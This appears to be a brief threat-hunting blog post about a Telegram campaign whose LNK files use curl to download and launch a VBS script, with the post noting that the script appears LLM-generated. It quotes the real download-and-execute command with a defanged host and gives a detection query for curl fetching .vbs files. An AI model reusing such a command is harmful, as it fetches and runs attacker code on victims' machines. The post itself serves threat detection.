168. Adversaries Abuse LLM to Generate Malicious Scripts

Hello everyone!

I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center.

The threat actors used Telegram to distribute archives with malicious LNK-files. These files abused cURL to download a malicious .vbs file from a remote server, for example:

C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

Here we have a nice hunting opportunity:

event_type: "processcreatewin"

AND

proc_file_name: "curl.exe"

AND

cmdline: "vbs"

So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge